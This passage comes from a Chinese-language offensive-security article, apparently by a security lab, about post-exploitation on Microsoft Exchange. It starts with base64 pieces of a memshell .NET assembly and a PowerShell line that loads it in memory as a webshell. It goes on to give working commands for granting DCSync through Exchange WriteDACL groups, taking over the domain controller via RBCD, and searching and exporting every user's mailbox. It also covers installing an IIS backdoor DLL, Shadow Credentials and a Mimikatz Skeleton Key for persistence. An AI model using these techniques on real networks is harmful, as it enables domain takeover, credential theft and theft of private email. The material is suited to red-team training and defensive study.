$x18="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYYAAATAIAAAAAAAAAAAAATAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAwAC4AMAAuADAALgAwAAAAPAANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABtAGUAbQBzAGgAZQBsAGwALgBkAGwAbAAAAAAAKAACAA"
$x19="EATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAEQADQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABtAGUAbQBzAGgAZQBsAGwALgBkAGwAbAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAwAA"
$x20="AAwMgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
$bytes = System.Convert]::FromBase64String($f)
[System.Reflection.Assembly]::load($bytes).CreateInstance("SharpMemshell")
后渗透
主要就是控制了exchange之后的一些操作,比如如何全局搜索关键词确定目标用户邮箱、拿域控、查看发件人IP。
4
攻击域控
当需要给特定用户赋予dcsync权限时,就需要给域对象添加相应的ACL。exchange服务器的权限很高,exchange的机器账户默认具有WriteDACL权限。并且如果域内安装了exchange服务器,会默认添加一个名为"Microsoft Exchange Security Groups"的ou。这个ou下面有两个特殊的组"Exchange Trusted Subsystem"和"Exchange Windows Permissions",并且前者是后者的组成员。默认情况下exchange-windows-permissions这个组对安装exchange的域对象就有WriteDacl权限。那么它的成员也会继承这个权限。同时,在安装exchange后还会生成一个组Organization Management,这个组可以修改其他exchange组的用户信息,所以当然也可以修改Exchange Trusted Subsystem组的成员信息,比如向里面加一个以获得的用户。
获得如下三个组内的用户凭据都可以通过dcsync导出hash
1. Exchange Trusted Subsystem
2. Exchange Windows Permissions
3. Organization Management
#为普通用户添加ACE来(访问控制属性)使其具有DCSync权限,然后就可以导出域中所有的hash相关信息。
可以通过powerview.ps1实现,下面的ACE对应上图中的属性。
DS-Replication-Get-Changes-->(GUID:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
DS-Replication-Get-Changes-->(GUID:89e95b76-444d-4c62-991a-0facbeda640c
exchange的机器用户位于"Exchange Trusted Subsystem"组下。上面说到这个组又是"Exchange Windows Permissions"的成员,所以exchage的机器用户对安装了exchange的域对象具有WriteDACL权限。
复现过程,假设已经获得了"Exchange Windows Permissions"的用户
此时chunni这个用户就具有了WriteDacl的权限。并且可以访问exchange服务器。但是并不能访问域控。此时chunni这个用户和exchange的机器用户都具有WriteDacl的权限。所以可以通过chunni给自己或者其他域用户添加DCSYNC的ACL导出域内所有hash控制域控。可以编写py脚本或通过powerview实现添加DCSYNC的ACL。
也可以给其他域用户赋予WriteDacl权限
此时通过chunni这个用户给自己或者其他域用户添加可以dcsync的acl就可以实现利用
但是这里失败了。正常的话这里是会成功的,又是我环境的问题。
当获取到了exchange的机器用户的凭据,
Dcsync
通过rbcd获取域控
当把exchagne拿下了之后,手里可能会有很多高权限账号(不一定是域管,可能有一些用户的acl存在问题,exchange的机器账号具有writeDacl权限)。如果我们发现了一个域账号对域控有委派权限,就可以配置一个机器账号(exchange)到域控的rbcd。比如获得了hash、aeskey、pfx证书都可以给域控配置rbcd的。
利用
noopy在他的博客里介绍了这么一种情况:“拿到了exchange的机器账号的AES秘钥,并且它是具有WriteDacl有效权限的。因为只有aes秘钥,我需要该工具能够使用 Kerberos 身份验证,因为我没有计算机帐户的密码或哈希值”。
其实就是通过aeskey通过keberos认证来写acl。
给用户写具有dcsync功能的acl,
可以进行dcsync了。
拿了exchage的机器账号然后通过设置exchange到域控的rbcd拿下域控。
5
导出邮箱列表
exchanger.py domain/user:[email protected] nspi list-tables
exchanger.py domain/user:[email protected] nspi dump-tables -guid 2b8c5358-146b-4c09-9df3-a0e761b3d7f7
6
导出邮件内容
通过outlook客户端导出全部收件箱为olm文件。
将上面保存好的olm文件再重新导入到oulook,效果如下:
比如我们在域里拿到了运维或者一些重要的账户邮箱的hash,就可以通过pth到ews接口来操作邮箱。
上面说到的exchanger.py同样也支持ntlm认证导出邮箱列表,下面这个脚本主通过ntlm-hash来导出邮箱内容。
7
获得发件人IP
登录exchange后台后,通过查看邮件详细信息。
8
登录其他用户邮箱
当获取了高权限的邮箱账号时可以通过exchange自带的功能访问其他用户邮箱(如果进行了配置)。
9
exchange management shell
Exchange Management Shell是专门用来操作exchange的shell,有自己的命令语法,当然也支持远程连接,通过它可以操作所有邮箱,包括列出所有邮箱列表、对所有邮箱中的关键词进行检索等。
如果3389登录了exchange可以如下操作:
如果是远程连接:
#远程导入exchange management shell模块
$User = "domain\username"
$Pass = ConvertTo-SecureString -AsPlainText Password -Force
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://exchange-server.nopoc.org/powershell -Authentication Kerberos -Credential $Credential
set-ExecutionPolicy RemoteSigned
Import-PSSession $Session -AllowClobber
常用命令:
#查看exchange版本信息
Get-ExchangeServer | fl name,AdminDisplayVersion,edition
#将xxx添加成邮箱管理员
New-ManagementRoleAssignment -Role "Mailbox Import Export" -User "xxx"
#查看所有邮箱
Get-Mailbox -ResultSize unlimited
#获得所有邮箱的信息,包括邮件数和上次访问邮箱的时间
Get-Mailbox | Get-MailboxStatistics
#导出特定用户邮箱
New-MailboxExportRequest -Mailbox xxx -Filepath "\\exchange-server\C$\123.pst"
#获得所有邮箱的信息,包括邮件数和上次访问邮箱的时间
Get-Mailbox | Get-MailboxStatistics
#查询exchange数据库名称
get-mailboxdatabase
#查看指定用户数据库名称
get-mailboxstatistics -identity admin | format-list
#查询所有邮箱(效果同上,只是想看怎么查看exchange的数据库名称)
Get-Mailbox -Database "Mailbox Database 0771921800"
模糊查询邮箱,
导出xxx的所有邮件为pst文件,
通过outlook导入.pst文件,
#导出指定用户的邮箱内容含有"靶标"关键词的邮箱内容
New-MailboxExportRequest -Mailbox xxx -ContentFilter {(body -like "靶标*") -or (body -like "xx")} -FilePath "\\exchange-server\C$\babiao.pst"
#导出某用户特定时间内的邮件
New-MailboxExportRequest -ContentFilter {((Received -gt '05/04/2013 0:00:00') -and (Received -lt '05/09/2013 23:59:59')) -or ((Sent -gt '05/04/2013 0:00:00') -and (Sent -lt '05/09/2013 23:59:59'))} -Mailbox xx -FilePath "\\exchange-server\C$\xx.pst"
#搜索所有邮箱的关键词,并将搜索结果导出到administrator有限的target文件夹中
Get-Mailbox | Search-Mailbox -SearchQuery '靶标地址' -TargetMailbox "administrator" -TargetFolder "target" -LogLevel Full
搜索结果如下,代表关键词出现在xxx这个用户的邮箱中。
权限维持的一些方法
主要是指域环境中的一些权限维持方式,可能不全。
1
ShadowCredentials
对域内所有msDS-KeyCredentialLink属性的写入权限,觉得是一种比较重要的方式。
Domain admins
Key Admins
Enterprise Key Admins
机器用户本身对self
当域内的环境满足如下条件时才可以利用:
域控制器版本在Windows Server 2016以上
域控制器上安装Active Directory证书服务(AD CS)或者其他服务器上安装AD CS
利用过程如下:
此时yanyuan1对vm-02已经有了修改vm-02$的msDS-KeyCredentialLink属性的权限。
2
WriteDACL
这个就没什么说的了。就是控了exchange之后,将一个账号添加到以下任意一个组中继承WriteDacl。也可以保存exchange机器用户的hash,因为它默认也是有WriteDacl权限的(exchange机器账号在
Exchange Trusted Subsystem组中)。这个账号就是你的后门账号,也算是一个权限维持吧。
Exchange Windows Permissions
Exchange Trusted Subsystem
Organization Management
3
IIS-RAID
C:\Windows\System32\inetsrv\appcmd.exe install module /name:test /image:"C:\IIS-Backdoor.dll" /add:true
py脚本将编码改成gb2312。dll可以更改特征实现免杀。
4
set-rbcd
"基于资源的约束委派利用就是通过在computer的'msDS-AllowedToActOnBehalfOfOtherIdentity'属性上配置一个值,这个值可以是computer$,也可以是域用户的SID。2012之前的非约束委派,当域管访问配置了非约束委派的机器A后会在其A的内存中保存域管的TGT。但是RBCD因为S4U的出现,A的内存中将不能保存域管的TGT了,但是要请求TGS必须需要TGT,S4U是这样解决的:A可以利用S4U2Self请求一张用户身份的TGS,然后A在利用这个TGS通过S4UProxy协议发起请求(可以申请到任意用户如administrator的TGS)。S4U2proxy:该拓展作用是使用一张用户身份的TGS(前面获得的administrator的TGS)去向KDC请求一张用于访问服务器B的TGS。"。所以同上,这里配置了rbcd的机器账号或者域账号就是我们的一个后门账号。
exchange机器账号(可以给自己配置rbcd)。
set-rbcd-computer
通过huazai$申请ST,
成功申请到了域管的ccache,接下来的利用就不截图了。(注意点就是有的域可能域管并不是administrator这个用户)。
Set-rbcd-user
在域内可能会遇见MQA=0的情况,也就是说没有办法创建机器用户,并且获取域内机器账号的凭据也比较困难(密码复杂,且定期更新)。但你手里可能会有很多域用户的凭据(密码喷洒)。所以此时可以通过配置域用户到exchange的RBCD。但是这Set-rbcd-user的方式需要目标环境支持rc4认证,并且因为密码策略的存在可能不能及时更改回来。1zzz已经把rbcd的利用方式总结了,除了通过利用没有SPN的用户配置rbcd之外,就是域内和域外的利用姿势了。
5
万能秘钥Skeleton Key
拿下域控后通过mimikatz的万能密码功能将Skeleton Key注入域控的lasses进程,实现的效果就是域内所有用户的密码都会"临时"变成万能密码"mimikatz",但是也可以使用原来的密码进行登录,因为是注入再lasses.exe中,所以域控重启万能密码就会失效。
6
SERVER (UN)TRUST ACCOUNT
拿下域控后更改机器用户的userAccountControl的标志位使其成为域控制器,然后根据域控的机器用户可以进行dcsync的特定进行后续利用。
参考文章
https://mp.weixin.qq.com/s/zsPPkhCZ8mhiFZ8sAohw6w
http://1zzzzz.com/rbcd/
https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html
https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users
https://github.com/grayddq/EBurst
https://github.com/sensepost/ruler/releases/tag/2.4.1
https://pentestlab.blog/2019/09/12/microsoft-exchange-acl/
https://www.n00py.io/2022/01/adding-dcsync-permissions-from-linux/
https://blog.csdn.net/weixin_33744854/article/details/93118424
([email protected]边界无限烛龙实验室供稿)
招聘信息
边界无限烛龙实验室
专注于漏洞挖掘、渗透技术等攻防技术研究与突破,从底层原理深入到一线实战对抗逐层铺开技术研究,深入解构攻与防的本质。团队核心成员来自于知名云厂商的各大安全实验室,拥有丰富的攻防对抗的工作经验,多次在国家、省级攻防演练中名列前茅。曾挖掘过 Google、微软、腾讯、阿里等国际知名厂商的安全漏洞并提供相关安全建议,同时团队成员研究成果在Defcon、ZeroNight、HITB等国际知名安全会议进行演示。